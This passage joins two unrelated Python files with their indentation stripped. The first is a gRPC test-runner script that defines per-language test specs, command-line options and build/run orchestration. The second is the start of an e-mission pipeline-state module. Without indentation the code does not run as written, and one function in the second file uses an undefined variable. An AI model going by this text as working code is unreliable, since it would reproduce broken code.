class CSharpLanguage(object):
def __init__(self):
self.platform = platform_string()
def configure(self, config, args):
self.config = config
self.args = args
if self.platform == 'windows':
_check_compiler(self.args.compiler, ['default', 'coreclr'])
_check_arch(self.args.arch, ['default'])
self._cmake_arch_option = 'x64'
else:
_check_compiler(self.args.compiler, ['default', 'coreclr'])
self._docker_distro = 'stretch'
def test_specs(self):
with open('src/csharp/tests.json') as f:
tests_by_assembly = json.load(f)
msbuild_config = _MSBUILD_CONFIG[self.config.build_config]
nunit_args = ['--labels=All', '--noresult', '--workers=1']
assembly_subdir = 'bin/%s' % msbuild_config
assembly_extension = '.exe'
if self.args.compiler == 'coreclr':
assembly_subdir += '/netcoreapp2.1'
runtime_cmd = ['dotnet', 'exec']
assembly_extension = '.dll'
else:
assembly_subdir += '/net45'
if self.platform == 'windows':
runtime_cmd = []
elif self.platform == 'mac':
# mono before version 5.2 on MacOS defaults to 32bit runtime
runtime_cmd = ['mono', '--arch=64']
else:
runtime_cmd = ['mono']
specs = []
for assembly in six.iterkeys(tests_by_assembly):
assembly_file = 'src/csharp/%s/%s/%s%s' % (
assembly, assembly_subdir, assembly, assembly_extension)
if self.config.build_config != 'gcov' or self.platform != 'windows':
# normally, run each test as a separate process
for test in tests_by_assembly[assembly]:
cmdline = runtime_cmd + [assembly_file,
'--test=%s' % test] + nunit_args
specs.append(
self.config.job_spec(
cmdline,
shortname='csharp.%s' % test,
environ=_FORCE_ENVIRON_FOR_WRAPPERS))
else:
# For C# test coverage, run all tests from the same assembly at once
# using OpenCover.Console (only works on Windows).
cmdline = [
'src\\csharp\\packages\\OpenCover.4.6.519\\tools\\OpenCover.Console.exe',
'-target:%s' % assembly_file, '-targetdir:src\\csharp',
'-targetargs:%s' % ' '.join(nunit_args),
'-filter:+[Grpc.Core]*', '-register:user',
'-output:src\\csharp\\coverage_csharp_%s.xml' % assembly
]
# set really high cpu_cost to make sure instances of OpenCover.Console run exclusively
# to prevent problems with registering the profiler.
run_exclusive = 1000000
specs.append(
self.config.job_spec(cmdline,
shortname='csharp.coverage.%s' %
assembly,
cpu_cost=run_exclusive,
environ=_FORCE_ENVIRON_FOR_WRAPPERS))
return specs
def pre_build_steps(self):
if self.platform == 'windows':
return [[
'tools\\run_tests\\helper_scripts\\pre_build_csharp.bat',
self._cmake_arch_option
]]
else:
return [['tools/run_tests/helper_scripts/pre_build_csharp.sh']]
def make_targets(self):
return ['grpc_csharp_ext']
def make_options(self):
return []
def build_steps(self):
if self.platform == 'windows':
return [['tools\\run_tests\\helper_scripts\\build_csharp.bat']]
else:
return [['tools/run_tests/helper_scripts/build_csharp.sh']]
def post_tests_steps(self):
if self.platform == 'windows':
return [['tools\\run_tests\\helper_scripts\\post_tests_csharp.bat']]
else:
return [['tools/run_tests/helper_scripts/post_tests_csharp.sh']]
def makefile_name(self):
if self.platform == 'windows':
return 'cmake/build/%s/Makefile' % self._cmake_arch_option
else:
# no need to set x86 specific flags as run_tests.py
# currently forbids x86 C# builds on both Linux and MacOS.
return 'cmake/build/Makefile'
def dockerfile_dir(self):
return 'tools/dockerfile/test/csharp_%s_%s' % (
self._docker_distro, _docker_arch_suffix(self.args.arch))
def __str__(self):
return 'csharp'
class ObjCLanguage(object):
def configure(self, config, args):
self.config = config
self.args = args
_check_compiler(self.args.compiler, ['default'])
def test_specs(self):
out = []
out.append(
self.config.job_spec(
['src/objective-c/tests/build_one_example_bazel.sh'],
timeout_seconds=10 * 60,
shortname='ios-buildtest-example-sample',
cpu_cost=1e6,
environ={
'SCHEME': 'Sample',
'EXAMPLE_PATH': 'src/objective-c/examples/Sample',
'FRAMEWORKS': 'NO'
}))
# Currently not supporting compiling as frameworks in Bazel
out.append(
self.config.job_spec(
['src/objective-c/tests/build_one_example.sh'],
timeout_seconds=20 * 60,
shortname='ios-buildtest-example-sample-frameworks',
cpu_cost=1e6,
environ={
'SCHEME': 'Sample',
'EXAMPLE_PATH': 'src/objective-c/examples/Sample',
'FRAMEWORKS': 'YES'
}))
out.append(
self.config.job_spec(
['src/objective-c/tests/build_one_example.sh'],
timeout_seconds=20 * 60,
shortname='ios-buildtest-example-switftsample',
cpu_cost=1e6,
environ={
'SCHEME': 'SwiftSample',
'EXAMPLE_PATH': 'src/objective-c/examples/SwiftSample'
}))
out.append(
self.config.job_spec(
['src/objective-c/tests/build_one_example_bazel.sh'],
timeout_seconds=10 * 60,
shortname='ios-buildtest-example-tvOS-sample',
cpu_cost=1e6,
environ={
'SCHEME': 'tvOS-sample',
'EXAMPLE_PATH': 'src/objective-c/examples/tvOS-sample',
'FRAMEWORKS': 'NO'
}))
# Disabled due to #20258
# TODO (mxyan): Reenable this test when #20258 is resolved.
# out.append(
# self.config.job_spec(
# ['src/objective-c/tests/build_one_example_bazel.sh'],
# timeout_seconds=20 * 60,
# shortname='ios-buildtest-example-watchOS-sample',
# cpu_cost=1e6,
# environ={
# 'SCHEME': 'watchOS-sample-WatchKit-App',
# 'EXAMPLE_PATH': 'src/objective-c/examples/watchOS-sample',
# 'FRAMEWORKS': 'NO'
# }))
out.append(
self.config.job_spec(['src/objective-c/tests/run_plugin_tests.sh'],
timeout_seconds=60 * 60,
shortname='ios-test-plugintest',
cpu_cost=1e6,
environ=_FORCE_ENVIRON_FOR_WRAPPERS))
out.append(
self.config.job_spec(
['src/objective-c/tests/run_plugin_option_tests.sh'],
timeout_seconds=60 * 60,
shortname='ios-test-plugin-option-test',
cpu_cost=1e6,
environ=_FORCE_ENVIRON_FOR_WRAPPERS))
out.append(
self.config.job_spec(
['test/core/iomgr/ios/CFStreamTests/build_and_run_tests.sh'],
timeout_seconds=20 * 60,
shortname='ios-test-cfstream-tests',
cpu_cost=1e6,
environ=_FORCE_ENVIRON_FOR_WRAPPERS))
# TODO: replace with run_one_test_bazel.sh when Bazel-Xcode is stable
out.append(
self.config.job_spec(['src/objective-c/tests/run_one_test.sh'],
timeout_seconds=60 * 60,
shortname='ios-test-unittests',
cpu_cost=1e6,
environ={'SCHEME': 'UnitTests'}))
out.append(
self.config.job_spec(['src/objective-c/tests/run_one_test.sh'],
timeout_seconds=60 * 60,
shortname='ios-test-interoptests',
cpu_cost=1e6,
environ={'SCHEME': 'InteropTests'}))
out.append(
self.config.job_spec(['src/objective-c/tests/run_one_test.sh'],
timeout_seconds=60 * 60,
shortname='ios-test-cronettests',
cpu_cost=1e6,
environ={'SCHEME': 'CronetTests'}))
out.append(
self.config.job_spec(['src/objective-c/tests/run_one_test.sh'],
timeout_seconds=30 * 60,
shortname='ios-perf-test',
cpu_cost=1e6,
environ={'SCHEME': 'PerfTests'}))
out.append(
self.config.job_spec(['src/objective-c/tests/run_one_test.sh'],
timeout_seconds=30 * 60,
shortname='ios-perf-test-posix',
cpu_cost=1e6,
environ={'SCHEME': 'PerfTestsPosix'}))
out.append(
self.config.job_spec(['test/cpp/ios/build_and_run_tests.sh'],
timeout_seconds=30 * 60,
shortname='ios-cpp-test-cronet',
cpu_cost=1e6,
environ=_FORCE_ENVIRON_FOR_WRAPPERS))
out.append(
self.config.job_spec(['src/objective-c/tests/run_one_test.sh'],
timeout_seconds=60 * 60,
shortname='mac-test-basictests',
cpu_cost=1e6,
environ={
'SCHEME': 'MacTests',
'PLATFORM': 'macos'
}))
out.append(
self.config.job_spec(['src/objective-c/tests/run_one_test.sh'],
timeout_seconds=30 * 60,
shortname='tvos-test-basictests',
cpu_cost=1e6,
environ={
'SCHEME': 'TvTests',
'PLATFORM': 'tvos'
}))
return sorted(out)
def pre_build_steps(self):
return []
def make_targets(self):
return []
def make_options(self):
return []
def build_steps(self):
return []
def post_tests_steps(self):
return []
def makefile_name(self):
return 'Makefile'
def dockerfile_dir(self):
return None
def __str__(self):
return 'objc'
class Sanity(object):
def configure(self, config, args):
self.config = config
self.args = args
_check_compiler(self.args.compiler, ['default'])
def test_specs(self):
import yaml
with open('tools/run_tests/sanity/sanity_tests.yaml', 'r') as f:
environ = {'TEST': 'true'}
if _is_use_docker_child():
environ['CLANG_FORMAT_SKIP_DOCKER'] = 'true'
environ['CLANG_TIDY_SKIP_DOCKER'] = 'true'
# sanity tests run tools/bazel wrapper concurrently
# and that can result in a download/run race in the wrapper.
# under docker we already have the right version of bazel
# so we can just disable the wrapper.
environ['DISABLE_BAZEL_WRAPPER'] = 'true'
return [
self.config.job_spec(cmd['script'].split(),
timeout_seconds=30 * 60,
environ=environ,
cpu_cost=cmd.get('cpu_cost', 1))
for cmd in yaml.load(f)
]
def pre_build_steps(self):
return []
def make_targets(self):
return ['run_dep_checks']
def make_options(self):
return []
def build_steps(self):
return []
def post_tests_steps(self):
return []
def makefile_name(self):
return 'Makefile'
def dockerfile_dir(self):
return 'tools/dockerfile/test/sanity'
def __str__(self):
return 'sanity'
# different configurations we can run under
with open('tools/run_tests/generated/configs.json') as f:
_CONFIGS = dict(
(cfg['config'], Config(**cfg)) for cfg in ast.literal_eval(f.read()))
_LANGUAGES = {
'c++': CLanguage('cxx', 'c++'),
'c': CLanguage('c', 'c'),
'grpc-node': RemoteNodeLanguage(),
'php': PhpLanguage(),
'php7': Php7Language(),
'python': PythonLanguage(),
'ruby': RubyLanguage(),
'csharp': CSharpLanguage(),
'objc': ObjCLanguage(),
'sanity': Sanity()
}
_MSBUILD_CONFIG = {
'dbg': 'Debug',
'opt': 'Release',
'gcov': 'Debug',
}
def _windows_arch_option(arch):
"""Returns msbuild cmdline option for selected architecture."""
if arch == 'default' or arch == 'x86':
return '/p:Platform=Win32'
elif arch == 'x64':
return '/p:Platform=x64'
else:
print('Architecture %s not supported.' % arch)
sys.exit(1)
def _check_arch_option(arch):
"""Checks that architecture option is valid."""
if platform_string() == 'windows':
_windows_arch_option(arch)
elif platform_string() == 'linux':
# On linux, we need to be running under docker with the right architecture.
runtime_arch = platform.architecture()[0]
if arch == 'default':
return
elif runtime_arch == '64bit' and arch == 'x64':
return
elif runtime_arch == '32bit' and arch == 'x86':
return
else:
print(
'Architecture %s does not match current runtime architecture.' %
arch)
sys.exit(1)
else:
if args.arch != 'default':
print('Architecture %s not supported on current platform.' %
args.arch)
sys.exit(1)
def _docker_arch_suffix(arch):
"""Returns suffix to dockerfile dir to use."""
if arch == 'default' or arch == 'x64':
return 'x64'
elif arch == 'x86':
return 'x86'
else:
print('Architecture %s not supported with current settings.' % arch)
sys.exit(1)
def runs_per_test_type(arg_str):
"""Auxiliary function to parse the "runs_per_test" flag.
Returns:
A positive integer or 0, the latter indicating an infinite number of
runs.
Raises:
argparse.ArgumentTypeError: Upon invalid input.
"""
if arg_str == 'inf':
return 0
try:
n = int(arg_str)
if n <= 0: raise ValueError
return n
except:
msg = '\'{}\' is not a positive integer or \'inf\''.format(arg_str)
raise argparse.ArgumentTypeError(msg)
def percent_type(arg_str):
pct = float(arg_str)
if pct > 100 or pct < 0:
raise argparse.ArgumentTypeError(
"'%f' is not a valid percentage in the [0, 100] range" % pct)
return pct
# This is math.isclose in python >= 3.5
def isclose(a, b, rel_tol=1e-09, abs_tol=0.0):
return abs(a - b) <= max(rel_tol * max(abs(a), abs(b)), abs_tol)
# parse command line
argp = argparse.ArgumentParser(description='Run grpc tests.')
argp.add_argument('-c',
'--config',
choices=sorted(_CONFIGS.keys()),
default='opt')
argp.add_argument(
'-n',
'--runs_per_test',
default=1,
type=runs_per_test_type,
help='A positive integer or "inf". If "inf", all tests will run in an '
'infinite loop. Especially useful in combination with "-f"')
argp.add_argument('-r', '--regex', default='.*', type=str)
argp.add_argument('--regex_exclude', default='', type=str)
argp.add_argument('-j', '--jobs', default=multiprocessing.cpu_count(), type=int)
argp.add_argument('-s', '--slowdown', default=1.0, type=float)
argp.add_argument('-p',
'--sample_percent',
default=100.0,
type=percent_type,
help='Run a random sample with that percentage of tests')
argp.add_argument('-f',
'--forever',
default=False,
action='store_const',
const=True)
argp.add_argument('-t',
'--travis',
default=False,
action='store_const',
const=True)
argp.add_argument('--newline_on_success',
default=False,
action='store_const',
const=True)
argp.add_argument('-l',
'--language',
choices=sorted(_LANGUAGES.keys()),
nargs='+',
required=True)
argp.add_argument('-S',
'--stop_on_failure',
default=False,
action='store_const',
const=True)
argp.add_argument('--use_docker',
default=False,
action='store_const',
const=True,
help='Run all the tests under docker. That provides ' +
'additional isolation and prevents the need to install ' +
'language specific prerequisites. Only available on Linux.')
argp.add_argument(
'--allow_flakes',
default=False,
action='store_const',
const=True,
help=
'Allow flaky tests to show as passing (re-runs failed tests up to five times)'
)
argp.add_argument(
'--arch',
choices=['default', 'x86', 'x64'],
default='default',
help=
'Selects architecture to target. For some platforms "default" is the only supported choice.'
)
argp.add_argument(
'--compiler',
choices=[
'default',
'gcc4.9',
'gcc5.3',
'gcc7.4',
'gcc8.3',
'gcc_musl',
'clang3.6',
'clang3.7',
'python2.7',
'python3.5',
'python3.6',
'python3.7',
'python3.8',
'pypy',
'pypy3',
'python_alpine',
'all_the_cpythons',
'electron1.3',
'electron1.6',
'coreclr',
'cmake',
'cmake_vs2015',
'cmake_vs2017',
'cmake_vs2019',
],
default='default',
help=
'Selects compiler to use. Allowed values depend on the platform and language.'
)
argp.add_argument('--iomgr_platform',
choices=['native', 'uv', 'gevent', 'asyncio'],
default='native',
help='Selects iomgr platform to build on')
argp.add_argument('--build_only',
default=False,
action='store_const',
const=True,
help='Perform all the build steps but don\'t run any tests.')
argp.add_argument('--measure_cpu_costs',
default=False,
action='store_const',
const=True,
help='Measure the cpu costs of tests')
argp.add_argument(
'--update_submodules',
default=[],
nargs='*',
help=
'Update some submodules before building. If any are updated, also run generate_projects. '
+
'Submodules are specified as SUBMODULE_NAME:BRANCH; if BRANCH is omitted, master is assumed.'
)
argp.add_argument('-a', '--antagonists', default=0, type=int)
argp.add_argument('-x',
'--xml_report',
default=None,
type=str,
help='Generates a JUnit-compatible XML report')
argp.add_argument('--report_suite_name',
default='tests',
type=str,
help='Test suite name to use in generated JUnit XML report')
argp.add_argument(
'--report_multi_target',
default=False,
const=True,
action='store_const',
help='Generate separate XML report for each test job (Looks better in UIs).'
)
argp.add_argument(
'--quiet_success',
default=False,
action='store_const',
const=True,
help=
'Don\'t print anything when a test passes. Passing tests also will not be reported in XML report. '
+ 'Useful when running many iterations of each test (argument -n).')
argp.add_argument(
'--force_default_poller',
default=False,
action='store_const',
const=True,
help='Don\'t try to iterate over many polling strategies when they exist')
argp.add_argument(
'--force_use_pollers',
default=None,
type=str,
help='Only use the specified comma-delimited list of polling engines. '
'Example: --force_use_pollers epoll1,poll '
' (This flag has no effect if --force_default_poller flag is also used)')
argp.add_argument('--max_time',
default=-1,
type=int,
help='Maximum test runtime in seconds')
argp.add_argument('--bq_result_table',
default='',
type=str,
nargs='?',
help='Upload test results to a specified BQ table.')
args = argp.parse_args()
flaky_tests = set()
shortname_to_cpu = {}
if args.force_default_poller:
_POLLING_STRATEGIES = {}
elif args.force_use_pollers:
_POLLING_STRATEGIES[platform_string()] = args.force_use_pollers.split(',')
jobset.measure_cpu_costs = args.measure_cpu_costs
# update submodules if necessary
need_to_regenerate_projects = False
for spec in args.update_submodules:
spec = spec.split(':', 1)
if len(spec) == 1:
submodule = spec[0]
branch = 'master'
elif len(spec) == 2:
submodule = spec[0]
branch = spec[1]
cwd = 'third_party/%s' % submodule
def git(cmd, cwd=cwd):
print('in %s: git %s' % (cwd, cmd))
run_shell_command('git %s' % cmd, cwd=cwd)
git('fetch')
git('checkout %s' % branch)
git('pull origin %s' % branch)
if os.path.exists('src/%s/gen_build_yaml.py' % submodule):
need_to_regenerate_projects = True
if need_to_regenerate_projects:
if jobset.platform_string() == 'linux':
run_shell_command('tools/buildgen/generate_projects.sh')
else:
print(
'WARNING: may need to regenerate projects, but since we are not on')
print(
' Linux this step is being skipped. Compilation MAY fail.')
# grab config
run_config = _CONFIGS[args.config]
build_config = run_config.build_config
if args.travis:
_FORCE_ENVIRON_FOR_WRAPPERS = {'GRPC_TRACE': 'api'}
languages = set(_LANGUAGES[l] for l in args.language)
for l in languages:
l.configure(run_config, args)
language_make_options = []
if any(language.make_options() for language in languages):
if not 'gcov' in args.config and len(languages) != 1:
print(
'languages with custom make options cannot be built simultaneously with other languages'
)
sys.exit(1)
else:
# Combining make options is not clean and just happens to work. It allows C & C++ to build
# together, and is only used under gcov. All other configs should build languages individually.
language_make_options = list(
set([
make_option for lang in languages
for make_option in lang.make_options()
]))
if args.use_docker:
if not args.travis:
print('Seen --use_docker flag, will run tests under docker.')
print('')
print(
'IMPORTANT: The changes you are testing need to be locally committed'
)
print(
'because only the committed changes in the current branch will be')
print('copied to the docker environment.')
time.sleep(5)
dockerfile_dirs = set([l.dockerfile_dir() for l in languages])
if len(dockerfile_dirs) > 1:
print('Languages to be tested require running under different docker '
'images.')
sys.exit(1)
else:
dockerfile_dir = next(iter(dockerfile_dirs))
child_argv = [arg for arg in sys.argv if not arg == '--use_docker']
run_tests_cmd = 'python tools/run_tests/run_tests.py %s' % ' '.join(
child_argv[1:])
env = os.environ.copy()
env['RUN_TESTS_COMMAND'] = run_tests_cmd
env['DOCKERFILE_DIR'] = dockerfile_dir
env['DOCKER_RUN_SCRIPT'] = 'tools/run_tests/dockerize/docker_run_tests.sh'
if args.xml_report:
env['XML_REPORT'] = args.xml_report
if not args.travis:
env['TTY_FLAG'] = '-t' # enables Ctrl-C when not on Jenkins.
subprocess.check_call(
'tools/run_tests/dockerize/build_docker_and_run_tests.sh',
shell=True,
env=env)
sys.exit(0)
_check_arch_option(args.arch)
def make_jobspec(cfg, targets, makefile='Makefile'):
if platform_string() == 'windows':
return [
jobset.JobSpec([
'cmake', '--build', '.', '--target',
'%s' % target, '--config', _MSBUILD_CONFIG[cfg]
],
cwd=os.path.dirname(makefile),
timeout_seconds=None) for target in targets
]
else:
if targets and makefile.startswith('cmake/build/'):
# With cmake, we've passed all the build configuration in the pre-build step already
return [
jobset.JobSpec(
[os.getenv('MAKE', 'make'), '-j',
'%d' % args.jobs] + targets,
cwd='cmake/build',
timeout_seconds=None)
]
if targets:
return [
jobset.JobSpec(
[
os.getenv('MAKE', 'make'), '-f', makefile, '-j',
'%d' % args.jobs,
'EXTRA_DEFINES=GRPC_TEST_SLOWDOWN_MACHINE_FACTOR=%f' %
args.slowdown,
'CONFIG=%s' % cfg, 'Q='
] + language_make_options +
([] if not args.travis else ['JENKINS_BUILD=1']) + targets,
timeout_seconds=None)
]
else:
return []
make_targets = {}
for l in languages:
makefile = l.makefile_name()
make_targets[makefile] = make_targets.get(makefile, set()).union(
set(l.make_targets()))
def build_step_environ(cfg):
environ = {'CONFIG': cfg}
msbuild_cfg = _MSBUILD_CONFIG.get(cfg)
if msbuild_cfg:
environ['MSBUILD_CONFIG'] = msbuild_cfg
return environ
build_steps = list(
set(
jobset.JobSpec(cmdline,
environ=build_step_environ(build_config),
timeout_seconds=_PRE_BUILD_STEP_TIMEOUT_SECONDS,
flake_retries=2)
for l in languages
for cmdline in l.pre_build_steps()))
if make_targets:
make_commands = itertools.chain.from_iterable(
make_jobspec(build_config, list(targets), makefile)
for (makefile, targets) in make_targets.items())
build_steps.extend(set(make_commands))
build_steps.extend(
set(
jobset.JobSpec(cmdline,
environ=build_step_environ(build_config),
timeout_seconds=None)
for l in languages
for cmdline in l.build_steps()))
post_tests_steps = list(
set(
jobset.JobSpec(cmdline, environ=build_step_environ(build_config))
for l in languages
for cmdline in l.post_tests_steps()))
runs_per_test = args.runs_per_test
forever = args.forever
def _shut_down_legacy_server(legacy_server_port):
try:
version = int(
urllib.request.urlopen('http://localhost:%d/version_number' %
legacy_server_port,
timeout=10).read())
except:
pass
else:
urllib.request.urlopen('http://localhost:%d/quitquitquit' %
legacy_server_port).read()
def _calculate_num_runs_failures(list_of_results):
"""Calculate number of runs and failures for a particular test.
Args:
list_of_results: (List) of JobResult object.
Returns:
A tuple of total number of runs and failures.
"""
num_runs = len(list_of_results) # By default, there is 1 run per JobResult.
num_failures = 0
for jobresult in list_of_results:
if jobresult.retries > 0:
num_runs += jobresult.retries
if jobresult.num_failures > 0:
num_failures += jobresult.num_failures
return num_runs, num_failures
# _build_and_run results
class BuildAndRunError(object):
BUILD = object()
TEST = object()
POST_TEST = object()
def _has_epollexclusive():
binary = 'bins/%s/check_epollexclusive' % args.config
if not os.path.exists(binary):
return False
try:
subprocess.check_call(binary)
return True
except subprocess.CalledProcessError as e:
return False
except OSError as e:
# For languages other than C and Windows the binary won't exist
return False
# returns a list of things that failed (or an empty list on success)
def _build_and_run(check_cancelled,
newline_on_success,
xml_report=None,
build_only=False):
"""Do one pass of building & running tests."""
# build latest sequentially
num_failures, resultset = jobset.run(build_steps,
maxjobs=1,
stop_on_failure=True,
newline_on_success=newline_on_success,
travis=args.travis)
if num_failures:
return [BuildAndRunError.BUILD]
if build_only:
if xml_report:
report_utils.render_junit_xml_report(
resultset, xml_report, suite_name=args.report_suite_name)
return []
if not args.travis and not _has_epollexclusive() and platform_string(
) in _POLLING_STRATEGIES and 'epollex' in _POLLING_STRATEGIES[
platform_string()]:
print('\n\nOmitting EPOLLEXCLUSIVE tests\n\n')
_POLLING_STRATEGIES[platform_string()].remove('epollex')
# start antagonists
antagonists = [
subprocess.Popen(['tools/run_tests/python_utils/antagonist.py'])
for _ in range(0, args.antagonists)
]
start_port_server.start_port_server()
resultset = None
num_test_failures = 0
try:
infinite_runs = runs_per_test == 0
one_run = set(spec for language in languages
for spec in language.test_specs()
if (re.search(args.regex, spec.shortname) and
(args.regex_exclude == '' or
not re.search(args.regex_exclude, spec.shortname))))
# When running on travis, we want out test runs to be as similar as possible
# for reproducibility purposes.
if args.travis and args.max_time <= 0:
massaged_one_run = sorted(one_run, key=lambda x: x.cpu_cost)
else:
# whereas otherwise, we want to shuffle things up to give all tests a
# chance to run.
massaged_one_run = list(
one_run) # random.sample needs an indexable seq.
num_jobs = len(massaged_one_run)
# for a random sample, get as many as indicated by the 'sample_percent'
# argument. By default this arg is 100, resulting in a shuffle of all
# jobs.
sample_size = int(num_jobs * args.sample_percent / 100.0)
massaged_one_run = random.sample(massaged_one_run, sample_size)
if not isclose(args.sample_percent, 100.0):
assert args.runs_per_test == 1, "Can't do sampling (-p) over multiple runs (-n)."
print("Running %d tests out of %d (~%d%%)" %
(sample_size, num_jobs, args.sample_percent))
if infinite_runs:
assert len(massaged_one_run
) > 0, 'Must have at least one test for a -n inf run'
runs_sequence = (itertools.repeat(massaged_one_run) if infinite_runs
else itertools.repeat(massaged_one_run, runs_per_test))
all_runs = itertools.chain.from_iterable(runs_sequence)
if args.quiet_success:
jobset.message(
'START',
'Running tests quietly, only failing tests will be reported',
do_newline=True)
num_test_failures, resultset = jobset.run(
all_runs,
check_cancelled,
newline_on_success=newline_on_success,
travis=args.travis,
maxjobs=args.jobs,
maxjobs_cpu_agnostic=max_parallel_tests_for_current_platform(),
stop_on_failure=args.stop_on_failure,
quiet_success=args.quiet_success,
max_time=args.max_time)
if resultset:
for k, v in sorted(resultset.items()):
num_runs, num_failures = _calculate_num_runs_failures(v)
if num_failures > 0:
if num_failures == num_runs: # what about infinite_runs???
jobset.message('FAILED', k, do_newline=True)
else:
jobset.message('FLAKE',
'%s [%d/%d runs flaked]' %
(k, num_failures, num_runs),
do_newline=True)
finally:
for antagonist in antagonists:
antagonist.kill()
if args.bq_result_table and resultset:
upload_extra_fields = {
'compiler': args.compiler,
'config': args.config,
'iomgr_platform': args.iomgr_platform,
'language': args.language[
0
], # args.language is a list but will always have one element when uploading to BQ is enabled.
'platform': platform_string()
}
try:
upload_results_to_bq(resultset, args.bq_result_table,
upload_extra_fields)
except NameError as e:
logging.warning(
e) # It's fine to ignore since this is not critical
if xml_report and resultset:
report_utils.render_junit_xml_report(
resultset,
xml_report,
suite_name=args.report_suite_name,
multi_target=args.report_multi_target)
number_failures, _ = jobset.run(post_tests_steps,
maxjobs=1,
stop_on_failure=False,
newline_on_success=newline_on_success,
travis=args.travis)
out = []
if number_failures:
out.append(BuildAndRunError.POST_TEST)
if num_test_failures:
out.append(BuildAndRunError.TEST)
return out
if forever:
success = True
while True:
dw = watch_dirs.DirWatcher(['src', 'include', 'test', 'examples'])
initial_time = dw.most_recent_change()
have_files_changed = lambda: dw.most_recent_change() != initial_time
previous_success = success
errors = _build_and_run(check_cancelled=have_files_changed,
newline_on_success=False,
build_only=args.build_only) == 0
if not previous_success and not errors:
jobset.message('SUCCESS',
'All tests are now passing properly',
do_newline=True)
jobset.message('IDLE', 'No change detected')
while not have_files_changed():
time.sleep(1)
else:
errors = _build_and_run(check_cancelled=lambda: False,
newline_on_success=args.newline_on_success,
xml_report=args.xml_report,
build_only=args.build_only)
if not errors:
jobset.message('SUCCESS', 'All tests passed', do_newline=True)
else:
jobset.message('FAILED', 'Some tests failed', do_newline=True)
exit_code = 0
if BuildAndRunError.BUILD in errors:
exit_code |= 1
if BuildAndRunError.TEST in errors:
exit_code |= 2
if BuildAndRunError.POST_TEST in errors:
exit_code |= 4
sys.exit(exit_code)
|
the-stack_106_14814
|
from __future__ import unicode_literals
from __future__ import print_function
from __future__ import division
from __future__ import absolute_import
from future import standard_library
standard_library.install_aliases()
from builtins import *
import logging
import datetime as pydt
import emission.core.get_database as edb
import emission.core.wrapper.pipelinestate as ps
import emission.storage.timeseries.timequery as estt
import time
END_FUZZ_AVOID_LTE = 5
def mark_usercache_done(user_id, last_processed_ts):
if last_processed_ts is None:
mark_stage_done(user_id, ps.PipelineStages.USERCACHE, None)
else:
mark_stage_done(user_id, ps.PipelineStages.USERCACHE, last_processed_ts + END_FUZZ_AVOID_LTE)
def get_time_range_for_usercache(user_id):
tq = get_time_range_for_stage(user_id, ps.PipelineStages.USERCACHE)
return tq
def get_time_range_for_accuracy_filtering(user_id):
return get_time_range_for_stage(user_id, ps.PipelineStages.ACCURACY_FILTERING)
def mark_accuracy_filtering_done(user_id, last_processed_ts):
if last_processed_ts is None:
mark_stage_done(user_id, ps.PipelineStages.ACCURACY_FILTERING, None)
else:
mark_stage_done(user_id, ps.PipelineStages.ACCURACY_FILTERING, last_processed_ts + END_FUZZ_AVOID_LTE)
def mark_accuracy_filtering_failed(user_id):
mark_stage_failed(user_id, ps.PipelineStages.ACCURACY_FILTERING)
def get_time_range_for_segmentation(user_id):
return get_time_range_for_stage(user_id, ps.PipelineStages.TRIP_SEGMENTATION)
def mark_segmentation_done(user_id, last_processed_ts):
if last_processed_ts is None:
mark_stage_done(user_id, ps.PipelineStages.TRIP_SEGMENTATION, None)
else:
mark_stage_done(user_id, ps.PipelineStages.TRIP_SEGMENTATION,
last_processed_ts + END_FUZZ_AVOID_LTE)
def mark_segmentation_failed(user_id):
mark_stage_failed(user_id, ps.PipelineStages.TRIP_SEGMENTATION)
def get_time_range_for_sectioning(user_id):
# Returns the time range for the trips that have not yet been converted into sections.
# Note that this is a query against the trip database, so we cannot search using the
# "write_ts" query. Instead, we change the query to be against the trip's end_ts
tq = get_time_range_for_stage(user_id, ps.PipelineStages.SECTION_SEGMENTATION)
tq.timeType = "data.end_ts"
return tq
def mark_sectioning_done(user_id, last_trip_done):
if last_trip_done is None:
mark_stage_done(user_id, ps.PipelineStages.SECTION_SEGMENTATION, None)
else:
mark_stage_done(user_id, ps.PipelineStages.SECTION_SEGMENTATION,
last_trip_done.data.end_ts + END_FUZZ_AVOID_LTE)
def mark_sectioning_failed(user_id):
mark_stage_failed(user_id, ps.PipelineStages.SECTION_SEGMENTATION)
def get_time_range_for_smoothing(user_id):
# type: (uuid.UUID) -> emission.storage.timeseries.timequery.TimeQuery
# Returns the time range for the trips that have not yet been converted into sections.
# Note that this is a query against the trip database, so we cannot search using the
# "write_ts" query. Instead, we change the query to be against the trip's end_ts
"""
:rtype: emission.storage.timeseries.timequery.TimeQuery
"""
tq = get_time_range_for_stage(user_id, ps.PipelineStages.JUMP_SMOOTHING)
tq.timeType = "data.end_ts"
return tq
def mark_smoothing_done(user_id, last_section_done):
if last_section_done is None:
mark_stage_done(user_id, ps.PipelineStages.JUMP_SMOOTHING, None)
else:
mark_stage_done(user_id, ps.PipelineStages.JUMP_SMOOTHING,
last_section_done.data.end_ts + END_FUZZ_AVOID_LTE)
def mark_smoothing_failed(user_id):
mark_stage_failed(user_id, ps.PipelineStages.JUMP_SMOOTHING)
def get_time_range_for_mode_inference(user_id):
tq = get_time_range_for_stage(user_id, ps.PipelineStages.MODE_INFERENCE)
tq.timeType = "data.end_ts"
return tq
def mark_mode_inference_complete(user_id):
if last_section_done is None:
mark_stage_done(user_id, ps.PipelineStages.MODE_INFERENCE, None)
else:
mark_stage_done(user_id, ps.PipelineStages.MODE_INFERENCE,
last_section_done.data.end_ts + END_FUZZ_AVOID_LTE)
def mark_mode_inference_failed(user_id):
mark_stage_failed(user_id, ps.PipelineStages.MODE_INFERENCE)
def get_complete_ts(user_id):
mode_infer_state = get_current_state(user_id, ps.PipelineStages.MODE_INFERENCE)
if mode_infer_state is not None:
return mode_infer_state.last_processed_ts
else:
cleaned_state = get_current_state(user_id, ps.PipelineStages.CLEAN_RESAMPLING)
if cleaned_state is not None:
return cleaned_state.last_processed_ts
else:
return None
def get_time_range_for_clean_resampling(user_id):
# type: (uuid.UUID) -> emission.storage.timeseries.timequery.TimeQuery
# Returns the time range for the trips that have not yet been converted into sections.
# Note that this is a query against the trip database, so we cannot search using the
# "write_ts" query. Instead, we change the query to be against the trip's end_ts
"""
:rtype: emission.storage.timeseries.timequery.TimeQuery
"""
tq = get_time_range_for_stage(user_id, ps.PipelineStages.CLEAN_RESAMPLING)
tq.timeType = "data.end_ts"
return tq
def mark_clean_resampling_done(user_id, last_section_done):
if last_section_done is None:
mark_stage_done(user_id, ps.PipelineStages.CLEAN_RESAMPLING, None)
else:
